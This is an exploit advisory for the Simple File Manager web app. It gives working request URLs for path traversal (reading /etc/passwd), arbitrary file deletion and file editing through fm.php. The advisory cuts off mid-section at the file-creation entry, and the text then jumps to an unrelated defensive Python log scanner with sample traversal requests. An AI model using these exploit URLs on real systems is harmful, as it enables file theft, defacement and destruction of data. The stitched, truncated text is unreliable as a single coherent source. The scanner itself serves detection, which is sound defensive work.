/*******************************************\
| flame vrs Simple File Manager <=0.24=>    |
| http://onedotoh.sourceforge.net/          |
| Various Vulnerabilities Including:        |
\*******************************************/

/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files                |
| Deletion of Arbitrary files               |
| Modification of Arbitrary files           |
| Creation of Arbitrary files               |
| Uploading of Malicious files              |
\+++++++++++++++++++++++++++++++++++++++++++/

/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based  |
| file management utility.                  |
| It is designed to be used by those that   |
| don't want to use ftp or SHOULD NOT use   |
| ftp. It can be dropped into a specific    |
| directory and give access to that         |
| directory as well as any directory below  |
| it, including those created by SFM. It    |
| can be placed in a specific directory and |
| configured to give access to other        |
| directories outside of its location       |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as     |
| well as directory navigation (within its  |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text    |
| viewer and mime type downloading.         |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
| That's the description from the author... |
| Which basically outlines all of its       |
| vulnerabilities.                          |
\___________________________________________/

/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2                                #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################ .:Deletion of Arbitrary Files:. ##############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext=                                                   #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATIVE PATH / FILENAME]&u=&copt=1&pathext=                                                               #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext=                                                #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE:                                                                                                  #
Filename:
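
On the defensive side, the read, delete and edit request patterns listed above can be searched for in web server access logs. The Python below is an added example, not part of the original advisory or of SFM; the Apache combined log format, the constructed sample lines and the function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters that carry [RELATIVE PATH / FILENAME] in the advisory's fm.php requests.
PATH_PARAMS = ("filename", "delete", "edit")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def escapes_base(value):
    """Return True if a path value resolves outside the directory SFM serves."""
    for _ in range(3):  # peel layered URL-encoding such as %252e%252e
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    if value.startswith("/") or re.match(r"[A-Za-z]:", value):
        return True  # absolute path, never relative to the managed directory
    norm = posixpath.normpath(value)
    return norm == ".." or norm.startswith("../")

def flag_requests(log_lines):
    """Return (line_no, param, value) for fm.php requests whose path leaves the base."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if posixpath.basename(url.path) != "fm.php":
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        for param in PATH_PARAMS:
            for value in query.get(param, []):
                if escapes_base(value):
                    hits.append((line_no, param, value))
    return hits

# Constructed sample access-log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /file/fm.php?action=download&filename=notes.txt&pathext=&u=&&copt=1&sortKey=2 HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2024:10:01:00 +0000] "GET /file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 HTTP/1.1" 200 1840',
    '192.0.2.66 - - [01/Jan/2024:10:02:00 +0000] "GET /file/fm.php?edit=../index.php&u=&copt=1&pathext= HTTP/1.1" 200 3021',
    '192.0.2.66 - - [01/Jan/2024:10:03:00 +0000] "GET /file/fm.php?action=download&filename=%252e%252e%252fconfig.php&pathext= HTTP/1.1" 200 77',
    '192.0.2.10 - - [01/Jan/2024:10:04:00 +0000] "GET /file/fm.php?action=download&filename=docs/../notes.txt&pathext= HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(*flag_requests(SAMPLE_LOG), sep="\n")
```

The check flags only values that leave the served directory; it says nothing about requests that stay inside it.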